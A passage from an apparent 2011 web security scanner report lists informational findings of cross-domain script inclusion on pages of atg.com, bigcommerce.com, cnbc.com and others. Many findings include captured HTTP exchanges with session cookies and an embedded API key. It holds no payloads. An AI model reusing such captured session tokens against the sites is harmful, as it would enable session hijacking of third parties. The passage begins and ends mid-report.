Referer: http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Date: Tue, 06 Sep 2011 15:32:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
X-Pingback: http://thinkwrap.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 15:32:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14268
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

...[SNIP]...
<link rel='stylesheet' id='sexy-bookmarks-css' href='http://www.bareagency.ca/wp-content/plugins/sexybookmarks/spritegen/shr-custom-sprite.css?ver=3.3.12' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=2.9.2'></script>
...[SNIP]...

20.62. http://www.atg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atg.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://static.atgsvcs.com/js/atgsvcs.js

Request

Response

20.63. http://www.atg.com/en/solutions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atg.com
Path:	/en/solutions/

Issue detail

The response dynamically includes the following script from another domain:

https://static.atgsvcs.com/js/atgsvcs.js

Request

Response

20.64. http://www.atg.com/service/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atg.com
Path:	/service/main.jsp

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

Response

20.65. https://www.atg.com/en/customers/listing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.atg.com
Path:	/en/customers/listing/

Issue detail

The response dynamically includes the following script from another domain:

https://static.atgsvcs.com/js/atgsvcs.js

Request

Response

20.66. https://www.atg.com/en/password/request/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.atg.com
Path:	/en/password/request/

Issue detail

The response dynamically includes the following script from another domain:

https://static.atgsvcs.com/js/atgsvcs.js

Request

Response

20.67. https://www.atg.com/en/register/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.atg.com
Path:	/en/register/

Issue detail

The response dynamically includes the following script from another domain:

https://static.atgsvcs.com/js/atgsvcs.js

Request

Response

20.68. https://www.atg.com/service/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.atg.com
Path:	/service/main.jsp

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

Response

20.69. http://www.beautyproductsdirect.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beautyproductsdirect.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-latest.js

Request

GET / HTTP/1.1
Host: www.beautyproductsdirect.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:22 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Tue, 17 May 2011 11:55:25 GMT
ETag: "29a4892-2c7c-4dd2622d"
Accept-Ranges: bytes
Content-Length: 11388
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Beauty Products Dire
...[SNIP]...
</script>
<script src="http://code.jquery.com/jquery-latest.js"></script>
...[SNIP]...

20.70. http://www.beautyproductsdirect.com/lashes.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beautyproductsdirect.com
Path:	/lashes.html

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-latest.js

Request

GET /lashes.html HTTP/1.1
Host: www.beautyproductsdirect.com
Proxy-Connection: keep-alive
Referer: http://www.beautyproductsdirect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=70985859.1555886779.1315345524.1315345524.1315345524.1; __utmb=70985859.1.10.1315345524; __utmc=70985859; __utmz=70985859.1315345524.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:56 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7d
Last-Modified: Tue, 17 May 2011 11:55:29 GMT
ETag: "29a4c72-21ef-4dd26231"
Accept-Ranges: bytes
Content-Length: 8687
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Beauty Products Dire
...[SNIP]...
</script>
<script src="http://code.jquery.com/jquery-latest.js"></script>
...[SNIP]...

20.71. http://www.bigcommerce.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigcommerce.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 15435
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.72. http://www.bigcommerce.com/in-the-news.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigcommerce.com
Path:	/in-the-news.php

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

GET /in-the-news.php HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
Referer: http://www.bigcommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:38:02 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 70448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.73. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigcommerce.com
Path:	/lp/e1-lp-ecommerce.php

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

Response

20.74. http://www.bigcommerce.com/plans.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigcommerce.com
Path:	/plans.php

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

GET /plans.php HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
Referer: http://www.bigcommerce.com/in-the-news.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:38:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 27530
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.75. https://www.bigcommerce.com/buzz.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bigcommerce.com
Path:	/buzz.php

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

GET /buzz.php HTTP/1.1
Host: www.bigcommerce.com
Connection: keep-alive
Referer: https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413513744:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343313744:41658941.2.10.1315341506; 2__utmc=^first.1378413513744:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.5.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 21572
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.76. https://www.bigcommerce.com/careers.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bigcommerce.com
Path:	/careers.php

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

GET /careers.php HTTP/1.1
Host: www.bigcommerce.com
Connection: keep-alive
Referer: https://support.bigcommerce.com/questions/1127/How+do+I+Setup+SocialShop+%28v2%29+Application+in+Facebook%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413586567:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343386567:41658941.8.10.1315341506; 2__utmc=^first.1378413586567:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.19.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:40:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 19250
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.77. https://www.bigcommerce.com/compatible-with.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bigcommerce.com
Path:	/compatible-with.php

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

GET /compatible-with.php HTTP/1.1
Host: www.bigcommerce.com
Connection: keep-alive
Referer: https://www.bigcommerce.com/buzz.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413564393:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343364393:41658941.3.10.1315341506; 2__utmc=^first.1378413564393:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.7.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 57374
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.78. https://www.bigcommerce.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bigcommerce.com
Path:	/login.php

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14684
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.79. https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bigcommerce.com
Path:	/pci-compliant-shopping-cart-software.php

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

GET /pci-compliant-shopping-cart-software.php HTTP/1.1
Host: www.bigcommerce.com
Connection: keep-alive
Referer: https://account.bigcommerce.com/cart.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:38:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14782
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.80. http://www.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP
http://js.adsonar.com/js/adsonar.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e088dnyD6ChwJv%2bxcg%2f2dGRjw%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7F4yDjO9qOD9M=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:26 GMT
Via: 1.1 C aicache6
Content-Length: 229771
Set-Cookie: xaikeeperua=yes; path=/
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Find the latest stock market news, information & headlines. Get u
...[SNIP]...
</script>

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.81. http://www.cnbc.com/id/15837856 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/id/15837856

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP
http://js.adsonar.com/js/adsonar.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc0N7KqRL%2blH5LCT1%2b0Uh3ks%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FgJb8gYY6CB4=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:30 GMT
Via: 1.1 C aicache6
Content-Length: 184638
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:36 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="View the ...CNBC US Television... section & see the full online T
...[SNIP]...
</script>

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<br><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.82. http://www.cnbc.com/id/15837856/site/14081545/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/id/15837856/site/14081545/

Issue detail

The response dynamically includes the following scripts from other domains:

